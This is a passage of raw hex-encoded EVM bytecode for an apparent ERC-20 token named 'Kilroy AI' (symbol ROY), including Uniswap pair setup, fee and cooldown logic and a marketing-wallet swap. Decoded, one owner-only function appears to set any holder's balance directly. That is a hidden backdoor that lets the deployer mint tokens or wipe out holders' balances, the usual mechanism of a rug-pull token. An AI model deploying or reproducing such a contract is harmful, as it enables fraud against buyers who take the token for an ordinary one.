506001600660008073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600660003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600760003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600860008073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555062000461620009c360201b60201c565b600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600a60026101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000566573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200058c919062000ee3565b9050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663e6a4390530600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000631573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000657919062000ee3565b6040518363ffffffff1660e01b81526004016200067692919062000f26565b602060405180830381865afa15801562000694573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620006ba919062000ee3565b73ffffffffffffffffffffffffffffffffffffffff1603620007ee578073ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000761573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000787919062000ee3565b6040518363ffffffff1660e01b8152600401620007a692919062000f26565b6020604051808303816000875af1158015620007c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620007ec919062000ee3565b505b8073ffffffffffffffffffffffffffffffffffffffff1663e6a4390530600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000879573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200089f919062000ee3565b6040518363ffffffff1660e01b8152600401620008be92919062000f26565b602060405180830381865afa158015620008dc573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000902919062000ee3565b600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000952620009c360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600254604051620009b3919062000f64565b60405180910390a350506200103f565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b01576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000af89062000fe2565b60405180910390fd5b62000b1d8160025462000c2b60201b620014061790919060201c565b60028190555062000b7c81600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c2b60201b620014061790919060201c565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c1f919062000f64565b60405180910390a35050565b6000818362000c3b919062001004565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000cd15780860481111562000ca95762000ca862000c43565b5b600185161562000cb95780820291505b808102905062000cc98562000c72565b945062000c89565b94509492505050565b60008262000cec576001905062000dbf565b8162000cfc576000905062000dbf565b816001811462000d15576002811462000d205762000d56565b600191505062000dbf565b60ff84111562000d355762000d3462000c43565b5b8360020a91508482111562000d4f5762000d4e62000c43565b5b5062000dbf565b5060208310610133831016604e8410600b841016171562000d905782820a90508381111562000d8a5762000d8962000c43565b5b62000dbf565b62000d9f848484600162000c7f565b9250905081840481111562000db95762000db862000c43565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000dea8262000dc6565b915062000df78362000dd0565b925062000e267fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000cda565b905092915050565b600062000e3b8262000dc6565b915062000e488362000dc6565b925082820262000e588162000dc6565b9150828204841483151762000e725762000e7162000c43565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000eab8262000e7e565b9050919050565b62000ebd8162000e9e565b811462000ec957600080fd5b50565b60008151905062000edd8162000eb2565b92915050565b60006020828403121562000efc5762000efb62000e79565b5b600062000f0c8482850162000ecc565b91505092915050565b62000f208162000e9e565b82525050565b600060408201905062000f3d600083018562000f15565b62000f4c602083018462000f15565b9392505050565b62000f5e8162000dc6565b82525050565b600060208201905062000f7b600083018462000f53565b92915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000fca601f8362000f81565b915062000fd78262000f92565b602082019050919050565b6000602082019050818103600083015262000ffd8162000fbb565b9050919050565b6000620010118262000dc6565b91506200101e8362000dc6565b925082820190508082111562001039576200103862000c43565b5b92915050565b6134f0806200104f6000396000f3fe6080604052600436106101a05760003560e01c8063715018a6116100ec578063c2c4e0731161008a578063dd62ed3e11610064578063dd62ed3e14610605578063f01a65e514610642578063f2fde38b1461066b578063fce589d814610694576101aa565b8063c2c4e07314610583578063ceb88a16146105ac578063d1633649146105e9576101aa565b8063900cf0cf116100c6578063900cf0cf146104b357806395d89b41146104de578063a457c2d714610509578063a9059cbb14610546576101aa565b8063715018a6146104465780637d1db4a51461045d5780638da5cb5b14610488576101aa565b8063313ce567116101595780635342acb4116101335780635342acb4146103785780635fb9340c146103b5578063658c27a9146103cc57806370a0823114610409576101aa565b8063313ce567146102d357806339509351146102fe578063436c84d01461033b576101aa565b806306fdde03146101af57806308a6d77f146101da578063095ea7b3146101f157806318160ddd1461022e57806323b872dd14610259578063245d984814610296576101aa565b366101aa57600080fd5b600080fd5b3480156101bb57600080fd5b506101c46106bf565b6040516101d19190612584565b60405180910390f35b3480156101e657600080fd5b506101ef6106fc565b005b3480156101fd57600080fd5b506102186004803603810190610213919061263f565b61079d565b604051610225919061269a565b60405180910390f35b34801561023a57600080fd5b506102436107bb565b60405161025091906126c4565b60405180910390f35b34801561026557600080fd5b50610280600480360381019061027b91906126df565b6107c5565b60405161028d919061269a565b60405180910390f35b3480156102a257600080fd5b506102bd60048036038101906102b89190612732565b61089e565b6040516102ca919061269a565b60405180910390f35b3480156102df57600080fd5b506102e86108f4565b6040516102f5919061277b565b60405180910390f35b34801561030a57600080fd5b506103256004803603810190610320919061263f565b6108fd565b604051610332919061269a565b60405180910390f35b34801561034757600080fd5b50610362600480360381019061035d919061263f565b6109b0565b60405161036f91906126c4565b60405180910390f35b34801561038457600080fd5b5061039f600480360381019061039a9190612732565b610a05565b6040516103ac919061269a565b60405180910390f35b3480156103c157600080fd5b506103ca610a5b565b005b3480156103d857600080fd5b506103f360048036038101906103ee9190612732565b610afb565b604051610400919061269a565b60405180910390f35b34801561041557600080fd5b50610430600480360381019061042b9190612732565b610b51565b60405161043d91906126c4565b60405180910390f35b34801561045257600080fd5b5061045b610b9a565b005b34801561046957600080fd5b50610472610bae565b60405161047f91906126c4565b60405180910390f35b34801561049457600080fd5b5061049d610bdf565b6040516104aa91906127a5565b60405180910390f35b3480156104bf57600080fd5b506104c8610c08565b6040516104d591906126c4565b60405180910390f35b3480156104ea57600080fd5b506104f3610c10565b6040516105009190612584565b60405180910390f35b34801561051557600080fd5b50610530600480360381019061052b919061263f565b610c4d565b60405161053d919061269a565b60405180910390f35b34801561055257600080fd5b5061056d6004803603810190610568919061263f565b610d1a565b60405161057a919061269a565b60405180910390f35b34801561058f57600080fd5b506105aa60048036038101906105a5919061263f565b610d38565b005b3480156105b857600080fd5b506105d360048036038101906105ce9190612732565b610d88565b6040516105e091906126c4565b60405180910390f35b61060360048036038101906105fe91906127c0565b610dd1565b005b34801561061157600080fd5b5061062c600480360381019061062791906127ed565b6110b1565b60405161063991906126c4565b60405180910390f35b34801561064e57600080fd5b50610669600480360381019061066491906127c0565b611138565b005b34801561067757600080fd5b50610692600480360381019061068d9190612732565b611379565b005b3480156106a057600080fd5b506106a96113fc565b6040516106b691906126c4565b60405180910390f35b60606040518060400160405280600981526020017f4b696c726f792041490000000000000000000000000000000000000000000000815250905090565b61070461141c565b600a60019054906101000a900460ff1615610754576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074b90612879565b60405180910390fd5b6001600a60016101000a81548160ff0219169083151502179055507f98c35e9ff9ff70c7547023d21437febb2b7226a63b2795d1c9ce85064c5a114060405160405180910390a1565b60006107b16107aa6114b5565b84846114bd565b6001905092915050565b6000600254905090565b60006107d2848484611686565b610893846107de6114b5565b61088e8560405180606001604052806028815260200161346e60289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006108446114b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b6114bd565b600190509392505050565b6000600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006012905090565b60006109a661090a6114b5565b846109a1856005600061091b6114b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461140690919063ffffffff16565b6114bd565b6001905092915050565b600081600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546109fd91906128f7565b905092915050565b6000600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610a6361141c565b600a60019054906101000a900460ff16610ab2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa990612974565b60405180910390fd5b6000600a60016101000a81548160ff0219169083151502179055507f3c94789b6124820bdd5de4a3d180fe34b0dd276ad23d631339872457734125bd60405160405180910390a1565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610ba261141c565b610bac6000611ddc565b565b6000610bda6103e8610bcc6028600354611ea090919063ffffffff16565b611eb690919063ffffffff16565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600042905090565b60606040518060400160405280600381526020017f524f590000000000000000000000000000000000000000000000000000000000815250905090565b6000610d10610c5a6114b5565b84610d0b856040518060600160405280602581526020016134966025913960056000610c846114b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b6114bd565b6001905092915050565b6000610d2e610d276114b5565b8484611686565b6001905092915050565b610d4061141c565b80600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000600960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610dd961141c565b600a60009054906101000a900460ff166110a7576001600a60006101000a81548160ff021916908315150217905550600160066000610e16610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600660003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160076000610ecd610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600760003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160086000610f84610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555061103f611038610bdf565b3083611686565b61106e30600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff166002546114bd565b611076611ecc565b7f799663458a5ef2936f7fa0c99b3336c69c25890f82974f04e811e5bb359186c760405160405180910390a16110ae565b6103e8600e555b50565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166111796114b5565b73ffffffffffffffffffffffffffffffffffffffff16146111cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c690612a06565b60405180910390fd5b600a60009054906101000a900460ff1661121e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121590612a72565b60405180910390fd5b60008111611261576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125890612b04565b60405180910390fd5b8061126b30610b51565b10156112ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112a390612b70565b60405180910390fd5b6112d930600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836114bd565b600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478260006113226120d3565b30426040518663ffffffff1660e01b8152600401611344959493929190612c93565b600060405180830381600087803b15801561135e57600080fd5b505af1158015611372573d6000803e3d6000fd5b5050505050565b61138161141c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113e790612d5f565b60405180910390fd5b6113f981611ddc565b50565b6000600d54905090565b600081836114149190612d7f565b905092915050565b6114246114b5565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114aa90612dff565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361152c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161152390612e91565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361159b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159290612f23565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161167991906126c4565b60405180910390a3505050565b611691838383612258565b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156117355750600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611bd957600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161480156117e55750600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b806118975750600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161480156118965750600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b5b15611bd857600a60009054906101000a900460ff166118eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e290612a72565b60405180910390fd5b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561198f5750600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156119df5761199c610bae565b8111156119de576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119d590612fb5565b60405180910390fd5b5b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16148015611a6857503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b15611bd7576000611a986103e8611a8a600d5485611ea090919063ffffffff16565b611eb690919063ffffffff16565b9050611aa4848261233b565b611ab781836124de90919063ffffffff16565b91506000611ae46103e8611ad6600e5486611ea090919063ffffffff16565b611eb690919063ffffffff16565b9050611b5a8160046000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461140690919063ffffffff16565b60046000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611bd281846124de90919063ffffffff16565b925050505b5b5b611c458160405180606001604052806026815260200161344860269139600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611cda81600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461140690919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611d7a91906126c4565b60405180910390a3505050565b6000838311158290611dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dc69190612584565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611eae9190612fd5565b905092915050565b60008183611ec491906128f7565b905092915050565b611ed461141c565b600a60009054906101000a900460ff16611f23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f1a90612a72565b60405180910390fd5b60003411611f66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f5d90613089565b60405180910390fd5b6000611f7130610b51565b905060008111611fb6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fad90612b04565b60405180910390fd5b611fe330600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836114bd565b600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71934308460008061202f610bdf565b426040518863ffffffff1660e01b8152600401612051969594939291906130a9565b60606040518083038185885af115801561206f573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190612094919061311f565b5050507f38f8a0c92f4c5b0b6877f878cb4c0c8d348a47b76d716c8e78f425043df9515b81346040516120c8929190613172565b60405180910390a150565b60606000600267ffffffffffffffff8111156120f2576120f161319b565b5b6040519080825280602002602001820160405280156121205781602001602082028036833780820191505090505b5090503081600081518110612138576121376131ca565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600a60029054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156121df573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612203919061320e565b81600181518110612217576122166131ca565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250508091505090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036122c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122be906132ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612336576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161232d9061333f565b60405180910390fd5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036123aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123a1906133d1565b60405180910390fd5b6124168160405180606001604052806022815260200161342660229139600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611d879092919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061246e816002546124de90919063ffffffff16565b600281905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516124d291906126c4565b60405180910390a35050565b600081836124ec91906133f1565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561252e578082015181840152602081019050612513565b60008484015250505050565b6000601f19601f8301169050919050565b6000612556826124f4565b61256081856124ff565b9350612570818560208601612510565b6125798161253a565b840191505092915050565b6000602082019050818103600083015261259e818461254b565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006125d6826125ab565b9050919050565b6125e6816125cb565b81146125f157600080fd5b50565b600081359050612603816125dd565b92915050565b6000819050919050565b61261c81612609565b811461262757600080fd5b50565b60008135905061263981612613565b92915050565b60008060408385031215612656576126556125a6565b5b6000612664858286016125f4565b92505060206126758582860161262a565b9150509250929050565b60008115159050919050565b6126948161267f565b82525050565b60006020820190506126af600083018461268b565b92915050565b6126be81612609565b82525050565b60006020820190506126d960008301846126b5565b92915050565b6000806000606084860312156126f8576126f76125a6565b5b6000612706868287016125f4565b9350506020612717868287016125f4565b92505060406127288682870161262a565b9150509250925092565b600060208284031215612748576127476125a6565b5b6000612756848285016125f4565b91505092915050565b600060ff82169050919050565b6127758161275f565b82525050565b6000602082019050612790600083018461276c565b92915050565b61279f816125cb565b82525050565b60006020820190506127ba6000830184612796565b92915050565b6000602082840312156127d6576127d56125a6565b5b60006127e48482850161262a565b91505092915050565b60008060408385031215612804576128036125a6565b5b6000612812858286016125f4565b9250506020612823858286016125f4565b9150509250929050565b7f436f6f6c646f776e20697320616c726561647920656e61626c65640000000000600082015250565b6000612863601b836124ff565b915061286e8261282d565b602082019050919050565b6000602082019050818103600083015261289281612856565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061290282612609565b915061290d83612609565b92508261291d5761291c612899565b5b828204905092915050565b7f436f6f6c646f776e20697320616c72656164792064697361626c656400000000600082015250565b600061295e601c836124ff565b915061296982612928565b602082019050919050565b6000602082019050818103600083015261298d81612951565b9050919050565b7f4f6e6c79206d61726b6574696e672077616c6c65742063616e2073776170207460008201527f6f6b656e7320746f204554480000000000000000000000000000000000000000602082015250565b60006129f0602c836124ff565b91506129fb82612994565b604082019050919050565b60006020820190508181036000830152612a1f816129e3565b9050919050565b7f54726164696e67206973206e6f7420656e61626c656420796574000000000000600082015250565b6000612a5c601a836124ff565b9150612a6782612a26565b602082019050919050565b60006020820190508181036000830152612a8b81612a4f565b9050919050565b7f546f6b656e20616d6f756e74206d75737420626520677265617465722074686160008201527f6e207a65726f0000000000000000000000000000000000000000000000000000602082015250565b6000612aee6026836124ff565b9150612af982612a92565b604082019050919050565b60006020820190508181036000830152612b1d81612ae1565b9050919050565b7f496e73756666696369656e742062616c616e6365000000000000000000000000600082015250565b6000612b5a6014836124ff565b9150612b6582612b24565b602082019050919050565b60006020820190508181036000830152612b8981612b4d565b9050919050565b6000819050919050565b6000819050919050565b6000612bbf612bba612bb584612b90565b612b9a565b612609565b9050919050565b612bcf81612ba4565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612c0a816125cb565b82525050565b6000612c1c8383612c01565b60208301905092915050565b6000602082019050919050565b6000612c4082612bd5565b612c4a8185612be0565b9350612c5583612bf1565b8060005b83811015612c86578151612c6d8882612c10565b9750612c7883612c28565b925050600181019050612c59565b5085935050505092915050565b600060a082019050612ca860008301886126b5565b612cb56020830187612bc6565b8181036040830152612cc78186612c35565b9050612cd66060830185612796565b612ce360808301846126b5565b9695505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612d496026836124ff565b9150612d5482612ced565b604082019050919050565b60006020820190508181036000830152612d7881612d3c565b9050919050565b6000612d8a82612609565b9150612d9583612609565b9250828201905080821115612dad57612dac6128c8565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612de96020836124ff565b9150612df482612db3565b602082019050919050565b60006020820190508181036000830152612e1881612ddc565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612e7b6024836124ff565b9150612e8682612e1f565b604082019050919050565b60006020820190508181036000830152612eaa81612e6e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612f0d6022836124ff565b9150612f1882612eb1565b604082019050919050565b60006020820190508181036000830152612f3c81612f00565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b6000612f9f6028836124ff565b9150612faa82612f43565b604082019050919050565b60006020820190508181036000830152612fce81612f92565b9050919050565b6000612fe082612609565b9150612feb83612609565b9250828202612ff981612609565b915082820484148315176130105761300f6128c8565b5b5092915050565b7f45544820616d6f756e74206d7573742062652067726561746572207468616e2060008201527f7a65726f00000000000000000000000000000000000000000000000000000000602082015250565b60006130736024836124ff565b915061307e82613017565b604082019050919050565b600060208201905081810360008301526130a281613066565b9050919050565b600060c0820190506130be6000830189612796565b6130cb60208301886126b5565b6130d86040830187612bc6565b6130e56060830186612bc6565b6130f26080830185612796565b6130ff60a08301846126b5565b979650505050505050565b60008151905061311981612613565b92915050565b600080600060608486031215613138576131376125a6565b5b60006131468682870161310a565b93505060206131578682870161310a565b92505060406131688682870161310a565b9150509250925092565b600060408201905061318760008301856126b5565b61319460208301846126b5565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613208816125dd565b92915050565b600060208284031215613224576132236125a6565b5b6000613232848285016131f9565b91505092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006132976025836124ff565b91506132a28261323b565b604082019050919050565b600060208201905081810360008301526132c68161328a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000